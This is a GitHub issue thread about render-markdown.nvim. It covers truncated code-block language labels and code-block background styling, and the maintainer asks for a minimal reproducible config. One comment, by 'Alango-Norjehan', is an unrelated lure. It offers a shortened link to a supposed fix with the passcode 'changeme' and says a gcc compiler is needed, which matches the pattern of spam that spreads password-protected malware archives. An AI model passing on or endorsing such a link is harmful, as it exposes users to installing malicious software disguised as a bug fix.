### ISSUE TITLE
bug: shell code block language displayed as `hell` & how to ensure different code background

### ISSUE THREAD

**Issue by uwla** [MeanderingProgrammer/render-markdown.nvim#150]
### Neovim version (nvim -v)

v0.10.1

### Operating system

ArchLinux

### Terminal emulator / GUI

Kitty & NeoVide

### Describe the bug

Issue 1: I have indented code blocks and the `shell` language is displayed as `hell`. If I change it to `bash` it will show `ash`.

![renderermarkdown](https://github.com/user-attachments/assets/b9cc9ebd-acd3-4409-90af-9f30ae1776d0)

Issue 2: How can I have a distinct background for code blocks instead of a white bottom line like in the picture above? Even without indentation, all code blocks have a white bottom line (dont like this) and the code background is not distintic (such as in the demo)

Here is the code:

```markdown
4. Run the scripts:

    To start development server using localStorage for storage:

    ```shell
    npm run dev
    ```

    To start development server using an REST server for storage:

    ```shell
    npm run dev:rest
    ```

    To build the demo app:

    ```shell
    npm run build
    ```
```

### Expected behavior

1. Display language properly.
2. Enable distinct background for code blocks instead of line separator.


### Healthcheck output

```
render-markdown: require("render-markdown.health").check()

render-markdown.nvim [version] ~
- OK plugin 6.2.11
- OK neovim >= 0.10

render-markdown.nvim [configuration] ~
- OK valid

render-markdown.nvim [nvim-treesitter] ~
- OK installed
- OK markdown: parser installed
- OK markdown: highlight enabled
- OK markdown_inline: parser installed
- OK markdown_inline: highlight enabled
- WARNING latex: parser not installed
  - ADVICE:
    - Disable LaTeX support to avoid this warning by setting { latex = { enabled = false } }

render-markdown.nvim [executables] ~
- OK latex2text: installed

render-markdown.nvim [conflicts] ~
- OK headlines: not installed
- OK obsidian: not installed
```

### Plugin configuration

```lua
    {
        url = "https://github.com/MeanderingProgrammer/render-markdown.nvim",
        opts = {
            heading = {
                sign = false,
            },
            code = {
                sign = false,
            },
        },
        dependencies = {
            "https://github.com/nvim-treesitter/nvim-treesitter",
            "https://github.com/nvim-tree/nvim-web-devicons",
        },
        ft = { "markdown" },
        cmds = { "RenderMarkdown" },
    },
```

### Plugin error log

N/A

### Confirmations

- [X] I have provided markdown text for any screenshots used in my description & understand that my issue will be closed if I have not

**Comment by Alango-Norjehan** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by MeanderingProgrammer** [comment]
I am unable to replicate this using the config and file provided. Can you do the following:

- Update the plugin
- Update the `markdown` parser: `:TSUpdate markdown`
- Update the `markdown_inline` parser: `:TSUpdate markdown_inline`

Check if the problem still exists.

**Comment by MeanderingProgrammer** [comment]
Hmm, I think I'm going to need a minimal reproducible example to figure out what's going on here.

At least for the indented code backgrounds with `deadcolumn.nvim` disabled there should be no problems.

With `deadcolumn.nvim` enabled unfortunately handling all the different interactions is not feasible and there are likely to be problems, so I'm going to ignore this part of the problem for now.

To create a minimal reproducible example we'll create a file called `minit.lua` with the following content:

```lua
-- Add any other options needed to cause the problem here
vim.opt.number = true
vim.opt.relativenumber = true

-- Basic lazy.nvim setup
local lazypath = vim.fn.stdpath('data') .. '/lazy/lazy.nvim'
if not vim.uv.fs_stat(lazypath) then
    local lazyrepo = 'https://github.com/folke/lazy.nvim.git'
    vim.fn.system({ 'git', 'clone', '--filter=blob:none', '--branch=stable', lazyrepo, lazypath })
end
vim.opt.rtp:prepend(lazypath)

require('lazy').setup({
    -- Feel free to use another colorscheme
    {
        'folke/tokyonight.nvim',
        config = function()
            ---@diagnostic disable-next-line: missing-fields
            require('tokyonight').setup({ style = 'night' })
            vim.cmd.colorscheme('tokyonight')
        end,
    },
    -- This part is needed to enable highlighting for treesitter
    {
        'nvim-treesitter/nvim-treesitter',
        build = ':TSUpdate',
        config = function()
            ---@diagnostic disable-next-line: missing-fields
            require('nvim-treesitter.configs').setup({
                ensure_installed = { 'markdown', 'markdown_inline' },
                highlight = { enable = true },
            })
        end,
    },
    -- Copied your configuration here
    {
        'MeanderingProgrammer/render-markdown.nvim',
        dependencies = { 'nvim-treesitter/nvim-treesitter', 'nvim-tree/nvim-web-devicons' },
        config = function()
            require('render-markdown').setup({
                heading = { sign = false },
                code = { sign = false },
            })
        end,
    },
})
```

Then open your example file with: `nvim -u minit.lua example-file.md`

Modify the `minit.lua` file until you are able to reproduce the bug, if my example causes the bug for you let me know that as well.

**Comment by MeanderingProgrammer** [comment]
Yeah, the various highlights that are generated at runtime are not recomputed when the color scheme is changed. How often are you changing your color scheme?

**Comment by MeanderingProgrammer** [comment]
I've added a ColorScheme autocommand to recreate runtime highlights when the color scheme is changed: https://github.com/MeanderingProgrammer/render-markdown.nvim/commit/199cc52ae970c86a6df843bd634db4dd932be1f0.

This should remove the weird lines after changing color schemes.

**Comment by MeanderingProgrammer** [comment]
Sure, though there might not be much to fix. Some conflicts between UI plugins will exist.

`indent-blankline` shouldn't be causing any problems. I also use it and opening the same file as your example I see no issues. If you add `indent-blankline` to `minit.lua` and open a file do you see any issues?

Rather than disabling one plugin at a time and seeing if there's a difference can you go the other way around and add one plugin at a time to `minit.lua`. Knowing there's some change when I disable this one is a lot less helpful than knowing if you add just this one plugin the UI breaks.

From this point forward can we please stick to: 

1. Here is the `minit.lua`
2. Here is the `markdown` file I'm rendering
3. Here is the bug in the UI

Otherwise I really can't help much, it relies too much on your specific config.
